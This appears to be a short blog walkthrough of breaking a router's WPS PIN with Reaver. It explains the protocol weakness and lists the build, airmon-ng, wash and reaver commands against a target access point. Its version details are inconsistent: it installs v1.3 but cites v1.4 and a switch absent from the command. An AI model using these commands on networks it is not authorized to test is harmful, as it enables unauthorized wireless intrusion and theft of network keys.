Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP’s 8-digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a check sum value, which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
Downloaded and installed Reaver (as of this date 18-01-2012 reaver v1.3)
tar -xzf reaver-1.3
make && make install
Carried out a quick scan with wash to get the details of my (now committed to the shelf of shame..) router.Using a wireless adapter with Realtek RTL8187L chipset with rtl8187 driver in this case.
Started the wireless interface on the channel of my AP (Channel 11)
(I was having issues with aireplay-ng when I had not specified the channel that should be used
airmon-ng start wlan0 11
wash -i mon0 –C
COMMAND TO GET DETAILS OF WPS (Wi-Fi Protected Setup) NETWORK
Start Reaver v1.4 with the -A switch, to not have Reaver associate with the router itself, in a
separate terminal window.
reaver -i mon0 –bssid (bssid of target WPS network) -c (channel) -e (essid of target WPS network) – vv
Now we have to wait until it matches pin and after that it will show you which pin matched out and works.
PIN MATCHING PROCESS
Next part of the article will be coming soon.
Till then cheers,HAPPY HACKING